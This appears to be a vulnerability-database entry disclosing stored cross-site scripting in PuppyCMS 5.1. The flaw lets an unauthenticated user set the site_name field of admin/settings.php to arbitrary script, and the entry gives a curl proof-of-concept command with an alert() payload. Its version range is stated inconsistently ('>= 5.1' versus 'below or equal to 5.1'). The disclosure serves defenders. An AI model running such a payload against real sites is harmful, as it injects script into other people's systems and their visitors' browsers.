| Title | PuppyCMS >= 5.1 - Cross-site Scripting Stored |
|---|
| Description | # Exploit Title: PuppyCMS >= 5.1 - Cross-site Scripting Stored
# Date: 2022-10-11
# Exploit Author: Mr Empy
# Vendor Homepage: https://github.com/choregus
# Software Link: https://github.com/choregus/puppyCMS
# Version: >= 5.1
# Tested on: Linux
Title:
================
PuppyCMS >= 5.1 - Cross-site Scripting Stored
Summary:
================
PuppyCMS versions below or equal to 5.1 are vulnerable to a Cross-site Scripting Stored exploit, which allows the injection of arbitrary JavaScript code through the site_name parameter without authentication. Exploitation can be used to manipulate the capabilities of victims' browsers.
Severity Level:
================
5.8 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Affected Product:
================
PuppyCMS >= v5.1
Steps to Reproduce:
================
1. Open your terminal and run this command:
TARGET="http://x.x.x.x/puppyCMS";XSS_PAYLOAD='<script>alert("PuppyCMS XSS")</script>';curl "$TARGET/admin/settings.php" -X POST -d "site_name=$XSS_PAYLOAD&site_root=/&password=&password-repeat=&site_template=top-nav-red&from_email=your%40email.com&submit=Submit" |
|---|
| Source | ⚠️ https://github.com/choregus/puppyCMS |
|---|
| User | mrempy (UID 24379) |
|---|
| Submission | 2022. 10. 12. AM 03:24 (4 years ago) |
|---|
| Moderation | 2022. 10. 12. AM 11:25 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 210699 [puppyCMS up to 5.1 /admin/settings.php site_name cross-site scripting] |
|---|
| Points | 20 |
|---|